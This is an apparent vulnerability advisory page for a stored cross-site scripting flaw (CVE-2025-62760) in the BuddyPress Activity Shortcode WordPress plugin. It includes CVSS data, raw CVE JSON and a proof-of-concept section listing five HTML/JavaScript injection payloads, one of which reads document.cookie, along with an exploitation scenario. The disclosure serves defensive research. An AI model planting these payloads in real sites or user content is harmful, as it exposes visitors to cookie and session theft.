Security Vulnerability Report
中文
CVE-2025-62760 CVSS 6.5 MEDIUM

CVE-2025-62760

Published: 2025-12-31 09:15:52
Last Modified: 2026-04-23 15:34:42

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in BuddyDev BuddyPress Activity Shortcode bp-activity-shortcode allows Stored XSS.This issue affects BuddyPress Activity Shortcode: from n/a through <= 1.1.8.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

BuddyPress Activity Shortcode (bp-activity-shortcode) <= 1.1.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- Stored XSS PoC for CVE-2025-62760 --> <!-- This PoC demonstrates the stored XSS vulnerability in BuddyPress Activity Shortcode plugin --> <!-- Method 1: Basic script injection --> <script>alert('XSS Vulnerability - CVE-2025-62760')</script> <!-- Method 2: Image tag with onerror handler --> <img src=x onerror=alert('Cookie stolen: ' + document.cookie)> <!-- Method 3: Event handler injection --> <body onload=alert('XSS Executed')> <!-- Method 4: SVG injection --> <svg onload=alert('XSS via SVG')> <!-- Method 5: JavaScript URI --> <a href="javascript:alert('XSS via link')">Click me</a> <!-- Exploitation scenario: --> <!-- 1. Attacker posts a BuddyPress activity with one of the above payloads --> <!-- 2. The payload is stored in the database without sanitization --> <!-- 3. When a user views a page containing [bp-activity-shortcode], the malicious script executes --> <!-- 4. Attacker can steal cookies, session tokens, or perform actions on behalf of the victim -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62760", "sourceIdentifier": "[email protected]", "published": "2025-12-31T09:15:51.770", "lastModified": "2026-04-23T15:34:41.527", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in BuddyDev BuddyPress Activity Shortcode bp-activity-shortcode allows Stored XSS.This issue affects BuddyPress Activity Shortcode: from n/a through <= 1.1.8."}, {"lang": "es", "value": "Vulnerabilidad de Neutralización Incorrecta de la Entrada Durante la Generación de Páginas Web ('cross-site scripting') en BuddyDev BuddyPress Activity Shortcode permite XSS Almacenado. Este problema afecta a BuddyPress Activity Shortcode: desde n/a hasta 1.1.8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/bp-activity-shortcode/vulnerability/wordpress-buddypress-activity-shortcode-plugin-1-1-8-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}